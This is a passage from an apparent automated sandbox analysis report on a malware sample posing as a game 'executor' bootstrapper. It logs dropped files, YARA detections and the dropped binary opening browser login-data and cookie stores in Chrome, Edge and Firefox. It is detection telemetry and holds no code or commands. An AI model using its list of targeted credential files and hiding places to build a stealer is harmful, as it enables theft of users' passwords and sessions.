                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D3DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,3_2_00D3DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exeCode function: 3_2_00D2B146 GetVersionExW,3_2_00D2B146
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PerfNET.exe PID: 6520, type: MEMORYSTR
                                    Source: Yara matchFile source: BootstrapperV1.19.exe, type: SAMPLE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED
                                    Source: Yara matchFile source: BootstrapperV1.19.exe, type: SAMPLE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.506570b.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 3.3.Solaraexecutor.exe.4f5070b.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.BootstrapperV1.19.exe.32b771a.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 13.0.PerfNET.exe.e00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.54ab86.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.BootstrapperV1.19.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Windows\ELAMBKUP\SIHClient.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, type: DROPPED
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
